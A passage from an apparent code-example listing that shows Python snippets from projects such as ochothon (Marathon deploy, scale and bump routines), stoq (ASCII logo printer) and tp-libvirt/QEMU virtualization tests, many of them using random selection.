            p1 = Point(
                random.randrange(minx, maxx) + random.random(),
                random.randrange(miny, maxy) + random.random())
            p2 = Point(
                p1.x + (random.random() * random.choice((1, -1)) * 0.01),
                p1.y + (random.random() * random.choice((1, -1)) * 0.01))
            # create a linestring connecting the two points
            # no constructor for linestring from points?
            l1 = LineString([(p1.x, p1.y), (p2.x, p2.y)])
            # add the first point and the linestring to the task's geometries
            task_geometries.append(TaskGeometry(p1))
            # set a linestring for every other challenge
            if not j % 2:
                task_geometries.append(TaskGeometry(l1))
            # instantiate the task and register it with challenge 'test'
            # Initialize a task with its challenge slug and persistent ID
            task = Task(challenge.slug, identifier, task_geometries)
            # because we are not using the API, we need to call set_location
            # explicitly to set the task's location
            task.set_location()
            # generate random string for the instruction
            task.instruction = task_instruction_text
            # set a status
            action = Action(random.choice(statuses),
                            user_id=random.choice(range(int(users))))
            task.append_action(action)
            # add the task to the session
            db.session.add(task)

    # commit the generated tasks and the challenge to the database.
    db.session.commit()

Example 35

Project: ochothon
Source File: bump.py
View license
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            #
            # - first peek and see what pods we have
            # - they should all map to one single marathon application (abort if not)
            # - we'll use the application identifier to retrieve the configuration json later on
            #
            def _query(zk):
                replies = fire(zk, self.cluster, 'info')
                return [hints['application'] for (_, hints, _) in replies.values()]

            js = run(self.proxy, _query)
            assert len(set(js)) == 1, '%s is mapping to 2+ marathon applications' % self.cluster
            app = js[0]

            #
            # - fetch the various versions for our app
            # - we want to get hold of the most recent configuration
            #
            url = 'http://%s/v2/apps/%s/versions' % (master, app)
            reply = get(url, headers=headers)
            code = reply.status_code
            logger.debug('-> %s (HTTP %d)' % (url, code))
            assert code == 200 or code == 201, 'delete failed (HTTP %d)' % code
            js = reply.json()

            #
            # - retrieve the latest one
            # - keep the docker container configuration and the # of tasks around
            #
            last = js['versions'][0]
            url = 'http://%s/v2/apps/%s/versions/%s' % (master, app, last)
            reply = get(url, headers=headers)
            code = reply.status_code
            logger.debug('-> %s (HTTP %d)' % (url, code))
            assert code == 200 or code == 201, 'delete failed (HTTP %d)' % code
            js = reply.json()

            spec = js['container']
            tag = spec['docker']['image']
            capacity = js['instances']

            #
            # - kill all the pods using a POST /control/kill
            # - wait for them to be dead
            #
            @retry(timeout=self.timeout, pause=0)
            def _spin():
                def _query(zk):
                    replies = fire(zk, self.cluster, 'control/kill', timeout=self.timeout)
                    return [(code, seq) for seq, _, code in replies.values()]

                #
                # - fire the request one or more pods
                # - wait for every pod to report back a HTTP 410 (GONE)
                # - this means the ochopod state-machine is now idling (e.g dead)
                #
                js = run(self.proxy, _query)
                gone = sum(1 for code, _ in js if code == 410)
                assert gone == len(js), 'at least one pod is still running'
                return

            _spin()

            #
            # - grab the docker image
            # - just add a :<version> suffix (or replace it) but don't change the image  proper
            # - update the image and PUT the new configuration back
            # - marathon will then kill & re-start all the tasks
            #
            tokens = tag.split(':')
            spec['docker']['image'] = \
                '%s:%s' % (tag, self.version) if len(tokens) < 2 else '%s:%s' % (tokens[0], self.version)
            js = \
                {
                    'container': spec
                }

            url = 'http://%s/v2/apps/%s' % (master, app)
            reply = put(url, data=json.dumps(js), headers=headers)
            code = reply.status_code
            logger.debug('-> %s (HTTP %d)' % (url, code))
            logger.debug(reply.text)
            assert code == 200 or code == 201, 'update failed (HTTP %d)' % code

            #
            # - the pods should now be starting
            # - wait for all the pods to be in the 'running' mode (they are 'dead' right now)
            # - the sequence counters allocated to our new pods are returned as well
            #
            target = ['running'] if self.strict else ['stopped', 'running']
            @retry(timeout=self.timeout, pause=3, default={})
            def _spin():
                def _query(zk):
                    replies = fire(zk, self.cluster, 'info')
                    return [(hints['process'], seq) for seq, hints, _ in replies.values() if hints['process'] in target]

                js = run(self.proxy, _query)
                assert len(js) == capacity, 'not all pods running yet'
                return js

            js = _spin()
            up = [seq for _, seq in js]
            assert len(up) == capacity, '1+ pods still not up (%d/%d)' % (len(up), capacity)
            self.out['up'] = up
            self.out['ok'] = True

            logger.debug('%s : %d pods updated to version "%s"' % (self.cluster, capacity, self.version))

        except AssertionError as failure:

            logger.debug('%s : failed to bump -> %s' % (self.cluster, failure))

        except Exception as failure:

            logger.debug('%s : failed to bump -> %s' % (self.cluster, diagnostic(failure)))

Example 36

Project: ochothon
Source File: deploy.py
View license
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            with open(self.template, 'r') as f:

                #
                # - parse the template yaml file (e.g container definition)
                #
                raw = yaml.load(f)
                assert raw, 'empty YAML input (user error ?)'

                #
                # - merge with our defaults
                # - we want at least the cluster & image settings
                # - TCP 8080 is added by default to the port list
                #
                defaults = \
                    {
                        'start': True,
                        'debug': False,
                        'settings': {},
                        'ports': [8080],
                        'verbatim': {}
                    }

                cfg = merge(defaults, raw)
                assert 'cluster' in cfg, 'cluster identifier undefined (user error ?)'
                assert 'image' in cfg, 'docker image undefined (user error ?)'

                #
                # - if a suffix is specified append it to the cluster identifier
                #
                if self.suffix:
                    cfg['cluster'] = '%s-%s' % (cfg['cluster'], self.suffix)

                #
                # - timestamp the application (we really want a new uniquely identified application)
                # - lookup the optional overrides and merge with our pod settings if specified
                # - this is what happens when the -o option is used
                #
                stamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S')
                qualified = '%s.%s' % (self.namespace, cfg['cluster'])
                application = 'ochopod.%s-%s' % (qualified, stamp)
                if qualified in self.overrides:

                    blk = self.overrides[qualified]
                    logger.debug('%s : overriding %d settings (%s)' % (self.template, len(blk), qualified))
                    cfg['settings'] = merge(cfg['settings'], blk)

                def _nullcheck(cfg, prefix):

                    #
                    # - walk through the settings and flag any null value
                    #
                    missing = []
                    if cfg is not None:
                        for key, value in cfg.items():
                            if value is None:
                                missing += ['%s.%s' % ('.'.join(prefix), key)]
                            elif isinstance(value, dict):
                                missing += _nullcheck(value, prefix + [key])

                    return missing

                missing = _nullcheck(cfg['settings'], ['pod'])
                assert not missing, '%d setting(s) missing ->\n\t - %s' % (len(missing), '\n\t - '.join(missing))

                #
                # - if we still have no target default it to 1 single pod
                #
                if not self.pods:
                    self.pods = 1

                #
                # - setup our port list
                # - the port binding is specified either by an integer (container port -> dynamic mesos port), by
                #   two integers (container port -> host port) or by an integer followed by a * (container port ->
                #   same port on the host)
                # - on top of that, all those options allow to specify whether the protocol is TCP or UDP by adding
                #   the desired protocol after the binding (e.g. '8080 tcp' or '8125 * udp'. TCP is the default if no
                #   protocol is specified.
                # - the marathon pods must by design map /etc/mesos
                #
                def _parse_port(token):
                    
                    #
                    # - tries to return an int if possible, a string otherwise
                    #
                    def get_token_no_protocol(token):
                        # - remove the protocol piece
                        t = token[:-4].strip()
                        try:
                            return int(t)
                        except ValueError:
                            return t
                    
                    if isinstance(token, str) and token.lower().endswith(' udp'):
                        protocol = 'udp'
                        token_no_protocol = get_token_no_protocol(token)
                        
                    elif isinstance(token, str) and token.lower().endswith(' tcp'):
                        protocol = 'tcp'
                        token_no_protocol = get_token_no_protocol(token)
                    else:
                        # - TCP is the default
                        protocol = 'tcp'
                        token_no_protocol = token    
                    
                    if isinstance(token_no_protocol, int):
                        return {'containerPort': token_no_protocol, 'protocol': protocol}
                    elif isinstance(token_no_protocol, str) and token_no_protocol.endswith(' *'):
                        port = int(token_no_protocol[:-2])
                        return {'containerPort': port, 'hostPort': port, 'protocol': protocol}
                    elif isinstance(token_no_protocol, str):
                        ports = token_no_protocol.split(' ')
                        assert len(ports) == 2, 'invalid port syntax (must be two integers separated by 1+ spaces optionally followed by the protocol (tcp or udp, defaults to tcp))'
                        return {'containerPort': int(ports[0]), 'hostPort': int(ports[1]), 'protocol': protocol}
                    else:
                        assert 0, 'invalid port syntax ("%s")' % token

                #
                # - craft the docker image specifier
                # - if -r is used make sure to add (or override) the :<label> suffix
                #
                image = cfg['image']
                tokens = image.split(':')
                image = '%s:%s' % (tokens[0], self.release) if self.release else image

                #
                # - note the marathon-ec2 ochopod bindings will set the application hint automatically
                #   via environment variable (e.g no need to specify it here)
                # - make sure to mount /etc/mesos and /opt/mesosphere to account for various mesos installs
                #
                ports = [_parse_port(token) for token in cfg['ports']] if 'ports' in cfg else []
                spec = \
                    {
                        'id': application,
                        'instances': self.pods,
                        'env':
                            {
                                'ochopod_cluster': cfg['cluster'],
                                'ochopod_debug': str(cfg['debug']).lower(),
                                'ochopod_start': str(cfg['start']).lower(),
                                'ochopod_namespace': self.namespace,
                                'pod': json.dumps(cfg['settings'])
                            },
                        'container':
                            {
                                'type': 'DOCKER',
                                'docker':
                                    {
                                        'forcePullImage': True,
                                        'image': image,
                                        'network': 'BRIDGE',
                                        'portMappings': ports
                                    },
                                'volumes':
                                    [
                                        {
                                            'containerPath': '/etc/mesos',
                                            'hostPath': '/etc/mesos',
                                            'mode': 'RO'
                                        },
                                        {
                                            'containerPath': '/opt/mesosphere',
                                            'hostPath': '/opt/mesosphere',
                                            'mode': 'RO'
                                        }
                                    ]
                            }
                    }

                #
                # - if we have a 'verbatim' block in our image definition yaml, merge it now
                #
                if 'verbatim' in cfg:
                    spec = merge(cfg['verbatim'], spec)

                #
                # - pick a marathon master at random
                # - fire the POST /v2/apps to create our application
                # - this will indirectly spawn our pods
                #
                url = 'http://%s/v2/apps' % master
                reply = post(url, data=json.dumps(spec), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'submission failed (HTTP %d)' % code

                #
                # - wait for all the pods to be in the 'running' mode
                # - the 'application' hint is set by design to the marathon application identifier
                # - the sequence counters allocated to our new pods are returned as well
                #
                target = ['dead', 'running'] if self.strict else ['dead', 'stopped', 'running']
                @retry(timeout=self.timeout, pause=3, default={})
                def _spin():
                    def _query(zk):
                        replies = fire(zk, qualified, 'info')
                        return [(hints['process'], seq) for seq, hints, _ in replies.values()
                                if hints['application'] == application and hints['process'] in target]

                    js = run(self.proxy, _query)
                    assert len(js) == self.pods, 'not all pods running yet'
                    return js

                js = _spin()
                running = sum(1 for state, _ in js if state is not 'dead')
                up = [seq for _, seq in js]
                self.out['up'] = up
                self.out['ok'] = self.pods == running
                logger.debug('%s : %d/%d pods are running ' % (self.template, running, self.pods))

                if not up:

                    #
                    # - nothing is running (typically because the image has an issue and is not
                    #   not booting the ochopod script for instance, which happens often)
                    # - in that case fire a HTTP DELETE against the marathon application to clean it up
                    #
                    url = 'http://%s/v2/apps/%s' % (master, application)
                    reply = delete(url, headers=headers)
                    code = reply.status_code
                    logger.debug('-> %s (HTTP %d)' % (url, code))
                    assert code == 200 or code == 204, 'application deletion failed (HTTP %d)' % code

        except AssertionError as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, failure))

        except YAMLError as failure:

            if hasattr(failure, 'problem_mark'):
                mark = failure.problem_mark
                logger.debug('%s : invalid deploy.yml (line %s, column %s)' % (self.template, mark.line+1, mark.column+1))

        except Exception as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, diagnostic(failure)))

Example 37

Project: ochothon
Source File: scale.py
View license
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            #
            # - first peek and see what pods we have
            #
            def _query(zk):
                replies = fire(zk, self.cluster, 'info')
                return [(seq, hints['application'], hints['task']) for (seq, hints, _) in replies.values()]

            #
            # - remap a bit differently and get an ordered list of task identifiers
            # - we'll use that to kill the newest pods
            #
            js = run(self.proxy, _query)
            total = len(js)
            if self.group is not None:

                #
                # - if -g was specify apply the scaling to the underlying marathon application containing that pod
                # - be careful to update the task list and total # of pods
                #
                keys = {seq: key for (seq, key, _) in js}
                assert self.group in keys, '#%d is not a valid pod index' % self.group
                app = keys[self.group]
                tasks = [(seq, task) for (seq, key, task) in sorted(js, key=(lambda _: _[0])) if key == app]
                total = sum(1 for (_, key, _) in js if key == app)

            else:

                #
                # - check and make sure all our pods map to one single marathon application
                #
                keys = set([key for (_, key, _) in js])
                assert len(keys) == 1, '%s maps to more than one application, you must specify -g' % self.cluster
                tasks = [(seq, task) for (seq, _, task) in sorted(js, key=(lambda _: _[0]))]
                app = keys.pop()

            #
            # - infer the target # of pods based on the user-defined factor
            #
            operator = self.factor[0]
            assert operator in ['@', 'x'], 'invalid operator'
            n = float(self.factor[1:])
            target = n if operator == '@' else total * n

            #
            # - clip the target # of pods down to 1
            #
            target = max(1, int(target))
            self.out['delta'] = target - total
            if target > total:

                #
                # - scale the application capacity up
                #
                js = \
                    {
                        'instances': target
                    }

                url = 'http://%s/v2/apps/%s' % (master, app)
                reply = put(url, data=json.dumps(js), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'update failed (HTTP %d)' % code

                #
                # - wait for all our new pods to be there
                #
                @retry(timeout=self.timeout, pause=3, default={})
                def _spin():
                    def _query(zk):
                        replies = fire(zk, self.cluster, 'info')
                        return [seq for seq, _, _ in replies.values()]

                    js = run(self.proxy, _query)
                    assert len(js) == target, 'not all pods running yet'
                    return js

                _spin()

            elif target < total:

                #
                # - if the fifo switch is on make sure to pick the oldest pods for deletion
                #
                tasks = tasks[:total - target] if self.fifo else tasks[target:]

                #
                # - kill all (or part of) the pods using a POST /control/kill
                # - wait for them to be dead
                #
                @retry(timeout=self.timeout, pause=0)
                def _spin():
                    def _query(zk):
                        indices = [seq for (seq, _) in tasks]
                        replies = fire(zk, self.cluster, 'control/kill', subset=indices, timeout=self.timeout)
                        return [(code, seq) for seq, _, code in replies.values()]

                    #
                    # - fire the request one or more pods
                    # - wait for every pod to report back a HTTP 410 (GONE)
                    # - this means the ochopod state-machine is now idling (e.g dead)
                    #
                    js = run(self.proxy, _query)
                    gone = sum(1 for code, _ in js if code == 410)
                    assert gone == len(js), 'at least one pod is still running'
                    return

                _spin()

                #
                # - delete all the underlying tasks at once using POST v2/tasks/delete
                #
                js = \
                    {
                        'ids': [task for (_, task) in tasks]
                    }

                url = 'http://%s/v2/tasks/delete?scale=true' % master
                reply = post(url, data=json.dumps(js), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'delete failed (HTTP %d)' % code

            self.out['ok'] = True

        except AssertionError as failure:

            logger.debug('%s : failed to scale -> %s' % (self.cluster, failure))

        except Exception as failure:

            logger.debug('%s : failed to scale -> %s' % (self.cluster, diagnostic(failure)))

Example 38

Project: stoq
Source File: logo.py
View license
def print_logo():
    """

    print random ascii art

    """

    logo = []

    logo.append("""
    .------..------..------..------.
    |S.--. ||T.--. ||O.--. ||Q.--. |
    | :/\: || :/\: || :/\: || (\/) |
    | :\/: || (__) || :\/: || :\/: |
    | '--'S|| '--'T|| '--'O|| '--'Q|
    `------'`------'`------'`------'

          Analysis. Simplified.
                 v{}
    """.format(__version__))

    logo.append("""
          *******                               * ***
        *       ***      *                    *  ****
       *         **     **                   *  *  ***
       **        *      **                  *  **   ***
        ***           ********    ****     *  ***    ***
       ** ***        ********    * ***  * **   **     **
        *** ***         **      *   ****  **   **     **
          *** ***       **     **    **   **   **     **
            *** ***     **     **    **   **   **     **
              ** ***    **     **    **   **   **     **
               ** **    **     **    **    **  ** *** **
                * *     **     **    **     ** *   ****
      ***        *      **      ******       ***     ***
     *  *********        **      ****         ******* **
    *     *****                                 ***   **
    *                                                 **
     **                                               *
                                                     *
                                                    *
                    Analysis. Simplified.
                          v{}
    """.format(__version__))

    logo.append("""
     .d8888b.  888             .d88888b.
    d88P  Y88b 888            d88P" "Y88b
    Y88b.      888            888     888
     "Y888b.   888888 .d88b.  888     888
        "Y88b. 888   d88""88b 888     888
          "888 888   888  888 888 Y8b 888
    Y88b  d88P Y88b. Y88..88P Y88b.Y8b88P
     "Y8888P"   "Y888 "Y88P"   "Y888888"
                                     Y8b
            Analysis. Simplified.
                  v{}
    """.format(__version__))

    logo.append("""
     _______ _______  _____   _____
     |______    |    |     | |   __|
     ______|    |    |_____| |____\|

           Analysis. Simplified.
                 v{}
    """.format(__version__))

    logo.append("""
      .--.--.       ___                  ,----..
     /  /    '.   ,--.'|_               /   /   '
    |  :  /`. /   |  | :,'    ,---.    /   .     :
    ;  |  |--`    :  : ' :   '   ,'\  .   /   ;.  '
    |  :  ;_    .;__,'  /   /   /   |.   ;   /  ` ;
     \  \    `. |  |   |   .   ; ,. :;   |  ; \ ; |
      `----.   \:__,'| :   '   | |: :|   :  | ; | '
      __ \  \  |  '  : |__ '   | .; :.   |  ' ' ' :
     /  /`--'  /  |  | '.'||   :    |'   ;  \; /  |
    '--'.     /   ;  :    ; \   \  /  \   \  ',  . "
      `--'---'    |  ,   /   `----'    ;   :      ; |
                   ---`-'               \   \ .'`--"
                                         `---`
                Analysis. Simplified.
                      v{}
    """.format(__version__))

    logo.append("""
     _______ _________ _______  _______
    (  ____ \\__   __/(  ___  )(  ___  )
    | (    \/   ) (   | (   ) || (   ) |
    | (_____    | |   | |   | || |   | |
    (_____  )   | |   | |   | || |   | |
          ) |   | |   | |   | || | /\| |
    /\____) |   | |   | (___) || (_\ \ |
    \_______)   )_(   (_______)(____\/_)

            Analysis. Simplified.
                  v{}
    """.format(__version__))

    logo.append("""
      _________  __          ________
     /   _____/_/  |_  ____  \_____  -
     \_____  \ \   __\/  _ \  /  / \  -
     /        \ |  | (  <_> )/   \_/.  -
    /_______  / |__|  \____/ \_____\ \_/
            \/                      \__>

            Analysis. Simplified.
                  v{}
    """.format(__version__))

    logo.append("""
               ___
              (   )
        .--.   | |_      .--.    .--.
      /  _  \ (   __)   /    \  /    "
     . .' `. ; | |     |  .-. ;|  .-. '
     | '   | | | | ___ | |  | || |  | |
     _\_`.(___)| |(   )| |  | || |  | |
    (   ). '.  | | | | | |  | || |  | |
     | |  `\ | | ' | | | '  | || '  | |
     ; '._,' ' ' `-' ; '  `-' /' `-'  |
      '.___.'   `.__.   `.__.'  `._ / |
                                    | |
                                   (___)

            Analysis. Simplified.
                  v{}
    """.format(__version__))

    logo.append("""
    ███████╗████████╗ ██████╗  ██████╗
    ██╔════╝╚══██╔══╝██╔═══██╗██╔═══██╗
    ███████╗   ██║   ██║   ██║██║   ██║
    ╚════██║   ██║   ██║   ██║██║▄▄ ██║
    ███████║   ██║   ╚██████╔╝╚██████╔╝
    ╚══════╝   ╚═╝    ╚═════╝  ╚══▀▀═╝

           Analysis. Simplified.
                 v{}
    """.format(__version__))

    logo.append("""
     ▄████████     ███      ▄██████▄  ████████▄
    ███    ███ ▀█████████▄ ███    ███ ███    ███
    ███    █▀     ▀███▀▀██ ███    ███ ███    ███
    ███            ███   ▀ ███    ███ ███    ███
    ▀███████████   ███     ███    ███ ███    ███
             ███   ███     ███    ███ ███    ███
       ▄█    ███   ███     ███    ███ ███  ▀ ███
     ▄████████▀   ▄████▀    ▀██████▀   ▀██████▀▄█

                   Analysis. Simplified.
                         v{}
    """.format(__version__))

    sys.stdout.flush()
    try:
        print(random.choice(logo))
    except:
        print(logo[3])
    sys.stdout.flush()

Example 39

Project: tp-libvirt
Source File: virsh_emulatorpin.py
View license
def run(test, params, env):
    """
    Test emulatorpin tuning

    1) Positive testing
       1.1) get the current emulatorpin parameters for a running/shutoff guest
       1.2) set the current emulatorpin parameters for a running/shutoff guest
    2) Negative testing
       2.1) get emulatorpin parameters for a running/shutoff guest
       2.2) set emulatorpin parameters running/shutoff guest
    """

    # Run test case
    vm_name = params.get("main_vm")
    vm = env.get_vm(vm_name)
    cgconfig = params.get("cgconfig", "on")
    cpulist = params.get("emulatorpin_cpulist")
    status_error = params.get("status_error", "no")
    change_parameters = params.get("change_parameters", "no")

    # Backup original vm
    vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)
    vmxml_backup = vmxml.copy()

    emulatorpin_placement = params.get("emulatorpin_placement", "")
    if emulatorpin_placement:
        vm.destroy()
        vmxml.placement = emulatorpin_placement
        vmxml.sync()
        try:
            vm.start()
        except VMStartError, detail:
            # Recover the VM and failout early
            vmxml_backup.sync()
            logging.debug("Used VM XML:\n %s", vmxml)
            raise error.TestFail("VM Fails to start: %s", detail)

    test_dicts = dict(params)
    test_dicts['vm'] = vm

    host_cpus = utils.count_cpus()
    test_dicts['host_cpus'] = host_cpus
    cpu_max = int(host_cpus) - 1

    cpu_list = None

    # Assemble cpu list for positive test
    if status_error == "no":
        if cpulist is None:
            pass
        elif cpulist == "x":
            cpulist = random.choice(utils.cpu_online_map())
        elif cpulist == "x-y":
            # By default, emulator is pined to all cpus, and element
            # 'cputune/emulatorpin' may not exist in VM's XML.
            # And libvirt will do nothing if pin emulator to the same
            # cpus, that means VM's XML still have that element.
            # So for testing, we should avoid that value(0-$cpu_max).
            if cpu_max < 2:
                cpulist = "0-0"
            else:
                cpulist = "0-%s" % (cpu_max - 1)
        elif cpulist == "x,y":
            cpulist = ','.join(random.sample(utils.cpu_online_map(), 2))
        elif cpulist == "x-y,^z":
            cpulist = "0-%s,^%s" % (cpu_max, cpu_max)
        elif cpulist == "-1":
            cpulist = "-1"
        elif cpulist == "out_of_max":
            cpulist = str(cpu_max + 1)
        else:
            raise error.TestNAError("CPU-list=%s is not recognized."
                                    % cpulist)
    test_dicts['emulatorpin_cpulist'] = cpulist
    if cpulist:
        cpu_list = cpus_parser(cpulist)
        test_dicts['cpu_list'] = cpu_list
        logging.debug("CPU list is %s", cpu_list)

    cg = utils_cgroup.CgconfigService()

    if cgconfig == "off":
        if cg.cgconfig_is_running():
            cg.cgconfig_stop()

    # positive and negative testing #########
    try:
        if status_error == "no":
            if change_parameters == "no":
                get_emulatorpin_parameter(test_dicts)
            else:
                set_emulatorpin_parameter(test_dicts)

        if status_error == "yes":
            if change_parameters == "no":
                get_emulatorpin_parameter(test_dicts)
            else:
                set_emulatorpin_parameter(test_dicts)
    finally:
        # Recover cgconfig and libvirtd service
        if not cg.cgconfig_is_running():
            cg.cgconfig_start()
            utils_libvirtd.libvirtd_restart()
        # Recover vm.
        vmxml_backup.sync()

Example 40

Project: tp-libvirt
Source File: virsh_vol_clone_wipe.py
View license
def run(test, params, env):
    """
    This test cover two volume commands: vol-clone and vol-wipe.

    1. Create a given type pool.
    2. Create a given format volume in the pool.
    3. Clone the new create volume.
    4. Wipe the new clone volume.
    5. Delete the volume and pool.
    """

    pool_name = params.get("pool_name")
    pool_type = params.get("pool_type")
    pool_target = params.get("pool_target")
    if not os.path.dirname(pool_target):
        pool_target = os.path.join(test.tmpdir, pool_target)
    emulated_image = params.get("emulated_image")
    emulated_image_size = params.get("emulated_image_size")
    vol_name = params.get("vol_name")
    new_vol_name = params.get("new_vol_name")
    vol_capability = params.get("vol_capability")
    vol_format = params.get("vol_format")
    clone_option = params.get("clone_option", "")
    wipe_algorithms = params.get("wipe_algorithms")

    if virsh.has_command_help_match("vol-clone", "--prealloc-metadata") is None:
        if "prealloc-metadata" in clone_option:
            raise error.TestNAError("Option --prealloc-metadata "
                                    "is not supported.")

    clone_status_error = "yes" == params.get("clone_status_error", "no")
    wipe_status_error = "yes" == params.get("wipe_status_error", "no")
    setup_libvirt_polkit = "yes" == params.get("setup_libvirt_polkit")

    # libvirt acl polkit related params
    uri = params.get("virsh_uri")
    unpri_user = params.get('unprivileged_user')
    if unpri_user:
        if unpri_user.count('EXAMPLE'):
            unpri_user = 'testacl'

    if not libvirt_version.version_compare(1, 1, 1):
        if setup_libvirt_polkit:
            raise error.TestNAError("API acl test not supported in current"
                                    " libvirt version.")

    # Using algorithms other than zero need scrub installed.
    try:
        utils_path.find_command('scrub')
    except utils_path.CmdNotFoundError:
        logging.warning("Can't locate scrub binary, only 'zero' algorithm "
                        "is used.")
        valid_algorithms = ["zero"]
    else:
        valid_algorithms = ["zero", "nnsa", "dod", "bsi", "gutmann",
                            "schneier", "pfitzner7", "pfitzner33", "random"]

    # Choose an algorithm randomly
    if wipe_algorithms:
        alg = random.choice(wipe_algorithms.split())
    else:
        alg = random.choice(valid_algorithms)

    libvirt_pvt = utlv.PoolVolumeTest(test, params)
    libvirt_pool = libvirt_storage.StoragePool()
    if libvirt_pool.pool_exists(pool_name):
        raise error.TestError("Pool '%s' already exist" % pool_name)
    try:
        # Create a new pool
        disk_vol = []
        if pool_type == 'disk':
            disk_vol.append(params.get("pre_vol", '10M'))
        libvirt_pvt.pre_pool(pool_name=pool_name,
                             pool_type=pool_type,
                             pool_target=pool_target,
                             emulated_image=emulated_image,
                             image_size=emulated_image_size,
                             pre_disk_vol=disk_vol)

        libvirt_vol = libvirt_storage.PoolVolume(pool_name)
        # Create a new volume
        if vol_format in ['raw', 'qcow2', 'qed', 'vmdk']:
            libvirt_pvt.pre_vol(vol_name=vol_name,
                                vol_format=vol_format,
                                capacity=vol_capability,
                                allocation=None,
                                pool_name=pool_name)
        elif vol_format == 'partition':
            vol_name = utlv.get_vol_list(pool_name).keys()[0]
            logging.debug("Find partition %s in disk pool", vol_name)
        elif vol_format == 'sparse':
            # Create a sparse file in pool
            sparse_file = pool_target + '/' + vol_name
            cmd = "dd if=/dev/zero of=" + sparse_file
            cmd += " bs=1 count=0 seek=" + vol_capability
            utils.run(cmd)
        else:
            raise error.TestError("Unknown volume format %s" % vol_format)

        # Refresh the pool
        virsh.pool_refresh(pool_name, debug=True)
        vol_info = libvirt_vol.volume_info(vol_name)
        if not vol_info:
            raise error.TestError("Fail to get info of volume %s" % vol_name)

        for key in vol_info:
            logging.debug("Original volume info: %s = %s", key, vol_info[key])

        # Metadata preallocation is not support for block volume
        if vol_info["Type"] == "block" and clone_option.count("prealloc-metadata"):
            clone_status_error = True

        if pool_type == "disk":
            new_vol_name = utlv.new_disk_vol_name(pool_name)
            if new_vol_name is None:
                raise error.TestError("Fail to generate volume name")
            # update polkit rule as the volume name changed
            if setup_libvirt_polkit:
                vol_pat = r"lookup\('vol_name'\) == ('\S+')"
                new_value = "lookup('vol_name') == '%s'" % new_vol_name
                utlv.update_polkit_rule(params, vol_pat, new_value)

        # Clone volume
        clone_result = virsh.vol_clone(vol_name, new_vol_name, pool_name,
                                       clone_option, debug=True)
        if not clone_status_error:
            if clone_result.exit_status != 0:
                raise error.TestFail("Clone volume fail:\n%s" %
                                     clone_result.stderr.strip())
            else:
                vol_info = libvirt_vol.volume_info(new_vol_name)
                for key in vol_info:
                    logging.debug("Cloned volume info: %s = %s", key,
                                  vol_info[key])
                logging.debug("Clone volume successfully.")
                # Wipe the new clone volume
                if alg:
                    logging.debug("Wiping volume by '%s' algorithm", alg)
                wipe_result = virsh.vol_wipe(new_vol_name, pool_name, alg,
                                             unprivileged_user=unpri_user,
                                             uri=uri, debug=True)
                unsupported_err = ["Unsupported algorithm",
                                   "no such pattern sequence"]
                if not wipe_status_error:
                    if wipe_result.exit_status != 0:
                        if any(err in wipe_result.stderr for err in unsupported_err):
                            raise error.TestNAError(wipe_result.stderr)
                        raise error.TestFail("Wipe volume fail:\n%s" %
                                             clone_result.stdout.strip())
                    else:
                        virsh_vol_info = libvirt_vol.volume_info(new_vol_name)
                        for key in virsh_vol_info:
                            logging.debug("Wiped volume info(virsh): %s = %s",
                                          key, virsh_vol_info[key])
                        vol_path = virsh.vol_path(new_vol_name,
                                                  pool_name).stdout.strip()
                        qemu_vol_info = utils_misc.get_image_info(vol_path)
                        for key in qemu_vol_info:
                            logging.debug("Wiped volume info(qemu): %s = %s",
                                          key, qemu_vol_info[key])
                            if qemu_vol_info['format'] != 'raw':
                                raise error.TestFail("Expect wiped volume "
                                                     "format is raw")
                elif wipe_status_error and wipe_result.exit_status == 0:
                    raise error.TestFail("Expect wipe volume fail, but run"
                                         " successfully.")
        elif clone_status_error and clone_result.exit_status == 0:
            raise error.TestFail("Expect clone volume fail, but run"
                                 " successfully.")
    finally:
        # Clean up
        try:
            libvirt_pvt.cleanup_pool(pool_name, pool_type, pool_target,
                                     emulated_image)
        except error.TestFail, detail:
            logging.error(str(detail))

Example 41

View license
@error.context_aware
def run(test, params, env):
    """
    This tests the disk hotplug/unplug functionality.
    1) prepares multiple disks to be hotplugged
    2) hotplugs them
    3) verifies that they are in qtree/guest system/...
    4) stop I/O stress_cmd
    5) unplugs them
    6) continue I/O stress_cmd
    7) verifies they are not in qtree/guest system/...
    8) repeats $repeat_times

    :param test: QEMU test object
    :param params: Dictionary with the test parameters
    :param env: Dictionary with test environment.
    """
    def verify_qtree(params, info_qtree, info_block, proc_scsi, qdev):
        """
        Verifies that params, info qtree, info block and /proc/scsi/ matches
        :param params: Dictionary with the test parameters
        :type params: virttest.utils_params.Params
        :param info_qtree: Output of "info qtree" monitor command
        :type info_qtree: string
        :param info_block: Output of "info block" monitor command
        :type info_block: dict of dicts
        :param proc_scsi: Output of "/proc/scsi/scsi" guest file
        :type proc_scsi: string
        :param qdev: qcontainer representation
        :type qdev: virttest.qemu_devices.qcontainer.DevContainer
        """
        err = 0
        qtree = qemu_qtree.QtreeContainer()
        qtree.parse_info_qtree(info_qtree)
        disks = qemu_qtree.QtreeDisksContainer(qtree.get_nodes())
        (tmp1, tmp2) = disks.parse_info_block(info_block)
        err += tmp1 + tmp2
        err += disks.generate_params()
